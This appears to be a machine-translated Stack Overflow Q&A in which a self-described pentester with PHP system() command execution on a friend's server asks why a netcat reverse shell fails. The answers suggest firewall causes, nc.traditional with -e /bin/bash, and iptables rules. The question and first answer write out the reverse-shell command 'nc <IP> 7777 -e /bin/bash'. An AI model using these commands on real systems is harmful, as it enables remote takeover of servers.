【问题标题】:Pentest - Cannot make reverse shellPentest - 无法制作反向外壳
【发布时间】:2017-06-29 13:44:49
【问题描述】:

我正在对朋友服务器进行渗透测试,并且我在服务器的 php 页面上成功编写了system(),然后我尝试对我的终端进行反向 shell。

我使用 NetCat 开始监听我的 7777 端口 nc -vlnp 7777
并检查是否已安装 NetCat。

所以发送命令到 php nc <MyIp> 7777 -e /bin/bash 以连接到我的终端 是的,没有用,根本不连接,是的,打开了我路由器上的端口。

有人知道为什么吗?

【问题讨论】:

  • 防火墙上的某种规则...
  • 我认为这应该在security.stackexchange.com上问
  • @lauda 好的,谢谢!
  • 使用 nscan 并查看端口是否实际上被远程机器/服务器视为打开

标签: php bash shell netcat


【解决方案1】:

可能有多种原因。

首先要考虑的是防火墙阻止您在受感染主机上的出站连接

其次,netcat 并不总是支持-e 参数。如果可能,安装 netcat 包apt-get install netcat 并使用nc.traditional <your IP> -e /bin/bash

祝你好运!

【讨论】:

    【解决方案2】:

    这是因为防火墙。尝试禁用 Windows 防火墙。 它使用基于主机的防火墙,因此只有在 Windows 机器已启动连接时,才会接受到 Windows 的任何传入连接。它基于动态包过滤原理。它会记住它已发送的 it 数据包并接受与其相关的任何连接。 与 Linux 相同。 iptables 配置。 iptables - L 确保您的防火墙没有阻止端口 7777。使用以下命令 iptables - A 输入 - i eth0 - p tcp - - 目标端口 7777 - j 接受 它是服务器试图连接到您的 PC 和 Linux 防火墙阻止它。 同样,如果您和您的服务器位于不同的网络中,那么路由器的网络防火墙会阻止任何传入连接,除非启用转发。

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2021-06-22
      • 1970-01-01
      • 2016-10-14
      相关资源
      最近更新 更多